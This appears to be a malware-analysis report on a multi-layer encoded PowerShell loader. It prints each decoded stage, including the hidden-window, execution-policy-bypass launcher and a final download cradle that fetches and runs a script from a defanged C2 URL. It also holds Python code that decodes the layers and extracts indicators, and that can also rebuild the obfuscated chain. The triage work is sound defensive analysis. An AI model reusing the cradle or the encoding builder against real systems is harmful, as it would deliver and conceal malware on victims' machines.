Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader, Defense Evasion.
powershell -nop -w hidden -ep bypass -EncodedCommand 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
Uses PowerShell to execute a base64-encoded PowerShell payload. The payload is obfuscated (3 decode layers); see the decoded content below.
The command invokes Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks (abuse category: Execute). It uses a 3-layer chained encoding (base64/UTF-16LE → base64+gzip → base64): the -EncodedCommand argument decodes to a script that gunzips and runs an embedded blob, which in turn base64-decodes and runs the final stage. Every stage is handed to iex and the final stage fetches its next script straight into memory, so nothing is written to disk. -EncodedCommand is a legitimate feature on its own; the signal here is its combination with -nop, -w hidden and -ep bypass and with nested decode-and-execute stages, which together indicate deliberate multi-stage obfuscation. Deep encoding stacks of this kind are strongly associated with mature malware loaders such as Lumma and Latrodectus and with ClickFix-style initial-access payloads.
1 network indicator was extracted (0 IPs, 1 URL: http://c2.loader-cdn[.]xyz/stage3.ps1); it returned no hits across the queried threat intelligence sources. Absence from threat-intelligence feeds is not evidence of benignity: loader staging domains are frequently newly registered or single-use, so the URL should still be blocked and searched for in proxy and DNS logs.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
Decoded layer 1 (base64/UTF-16LE, from -EncodedCommand): base64-decodes an embedded blob, gunzips it in memory and runs the result with iex:
$b=[System.Convert]::FromBase64String("H4sIAHXJ/2kC/zXKOw6CMAAA0KsY4iALMWgNalxEqICfyEewxoHSRhqwIBQET6+Dri9vWK6uXl8L+lB82gnF4ElBGL/fFovANzUFUuGJ6gujf9ML3tJKfINZFY91XNPZ9FckLzhfHD09oigRvmo/UXgYWwbIiQ4iFNobDPMc81O5y9yWqKDGqpkFE7ePQ8Ad3S7I1n0dmdZe3laD4TxF8NzvwkOG87qJohRQNn8TaHLk75tku+8slpWSLC8Z7QbD8gNaxr3DzAAAAA==");$gz=New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream(,$b)),[IO.Compression.CompressionMode]::Decompress);$sr=New-Object IO.StreamReader($gz);iex $sr.ReadToEnd()
Decoded layer 2 (base64+gzip, decompressed from the blob in layer 1): base64-decodes an embedded string and runs it with iex:
$p=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SUVYKChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vYzIubG9hZGVyLWNkblsuXXh5ei9zdGFnZTMucHMxIikp"));iex $p
Decoded layer 3 (base64, decoded from the string in layer 2; final payload): download cradle that fetches a remote script and executes it in memory without touching disk:
IEX((New-Object Net.WebClient).DownloadString("http://c2.loader-cdn[.]xyz/stage3.ps1"))
All indicators appear clean across queried sources.
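The decode chain above, as an added example (not the analysis tool's own code): a Python decoder that peels the -EncodedCommand argument layer by layer, classifies each layer by how it was wrapped (UTF-16LE, gzip, plain base64), and pulls the network indicator and a triage verdict out of the final stage. Because the encoded argument itself is not reproduced on this page, the example rebuilds an equivalent one from the three decoded layers shown above (marked as constructed in the code); the function names, the gzip/UTF-16LE detection heuristics and the triage rules are the example's own assumptions.

```python
"""Peel a layered PowerShell -EncodedCommand payload and extract IOCs.
Added example, not the analysis tool's code.  The encoded argument is
rebuilt locally from the page's decoded layers because the original value
is not available on the page."""
import base64
import gzip
import re
from typing import List, Tuple

# Final-stage download cradle exactly as shown in decoded layer 3 above
# (the URL is defanged with "[.]", as on the page).
STAGE3_CRADLE = ('IEX((New-Object Net.WebClient).DownloadString('
                 '"http://c2.loader-cdn[.]xyz/stage3.ps1"))')

B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
URL_RE = re.compile(r'https?://[^\s"\')]+')
GZIP_MAGIC = b"\x1f\x8b"


def build_encoded_command(cradle: str = STAGE3_CRADLE) -> str:
    """Constructed stand-in for the removed -EncodedCommand argument: wraps
    `cradle` in the same chain the page documents, innermost layer first
    (base64 -> gzip+base64 -> base64 over UTF-16LE)."""
    inner = base64.b64encode(cradle.encode()).decode()
    layer2 = ('$p=[System.Text.Encoding]::UTF8.GetString('
              f'[System.Convert]::FromBase64String("{inner}"));iex $p')
    gz = base64.b64encode(gzip.compress(layer2.encode())).decode()
    layer1 = (f'$b=[System.Convert]::FromBase64String("{gz}");'
              '$gz=New-Object IO.Compression.GZipStream('
              '(New-Object IO.MemoryStream(,$b)),'
              '[IO.Compression.CompressionMode]::Decompress);'
              '$sr=New-Object IO.StreamReader($gz);iex $sr.ReadToEnd()')
    # powershell -EncodedCommand expects base64 of the UTF-16LE script bytes
    return base64.b64encode(layer1.encode("utf-16-le")).decode()


def decode_blob(blob: bytes) -> Tuple[str, str]:
    """Classify one base64-decoded blob and turn it back into script text.
    gzip is recognised by its magic bytes, UTF-16LE by the NUL in byte 1
    (true for any ASCII-leading script); everything else is treated as UTF-8."""
    if blob.startswith(GZIP_MAGIC):
        return "gzip", gzip.decompress(blob).decode("utf-8", errors="replace")
    if len(blob) >= 2 and blob[1] == 0:
        return "utf16le", blob.decode("utf-16-le", errors="replace")
    return "base64", blob.decode("utf-8", errors="replace")


def peel_layers(encoded_command: str, max_layers: int = 10) -> List[Tuple[str, str]]:
    """Decode -EncodedCommand, then keep unwrapping while the current script
    still embeds a FromBase64String("...") literal.  Returns (kind, script)
    per layer, outermost first.  max_layers bounds runaway decompression."""
    layers: List[Tuple[str, str]] = []
    blob = base64.b64decode(encoded_command)
    for _ in range(max_layers):
        kind, script = decode_blob(blob)
        layers.append((kind, script))
        match = B64_CALL.search(script)
        if match is None:
            break
        blob = base64.b64decode(match.group(1))
    return layers


def extract_urls(layers: List[Tuple[str, str]]) -> List[str]:
    """URLs from every layer; defanged forms are returned as written."""
    return [u for _, script in layers for u in URL_RE.findall(script)]


def triage(encoded_command: str) -> dict:
    """What an analyst needs at a glance: decode depth, the wrapping chain,
    whether the final stage is an in-memory download cradle, and the URLs."""
    layers = peel_layers(encoded_command)
    final = layers[-1][1]
    fetches = "DownloadString" in final or "DownloadFile" in final
    executes = re.search(r"\biex\b|\bInvoke-Expression\b", final, re.I) is not None
    return {
        "depth": len(layers),
        "chain": [kind for kind, _ in layers],
        "download_cradle": fetches and executes,
        "urls": extract_urls(layers),
    }


if __name__ == "__main__":
    sample = build_encoded_command()
    for i, (kind, script) in enumerate(peel_layers(sample), 1):
        print(f"layer {i} ({kind}): {script[:80]}...")
    print(triage(sample))
```

The gzip and UTF-16LE checks are deliberately cheap heuristics: a real loader may pad, reverse or XOR a stage, so in practice each new decoder branch is added when an unwrapped layer stops matching the FromBase64String pattern but still looks like code. Bounding the loop with max_layers matters when the sample is untrusted, since a gzip layer can expand far beyond the size of the command line that carried it.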
Powershell.exe is a task-based command-line shell built on .NET.
APT28: Russian GRU Unit 26165 threat group, active since at least 2004. Primarily targets governments, militaries, and security organizations.
APT29: Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Sandworm Team: Russian GRU Unit 74455 group responsible for NotPetya, the attacks on the Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Turla: Russian FSB-linked group known for sophisticated backdoors and for hijacking other threat actors' infrastructure. Active since at least 2004.
Lazarus Group: North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and the Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution is based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth, not a definitive attribution. Encoded PowerShell, download cradles and layered obfuscation are shared by commodity crimeware, initial-access brokers and red teams alike, so overlap on these techniques alone should not drive attribution; the groups listed above are context for the observed TTPs, not a claim about who sent this sample.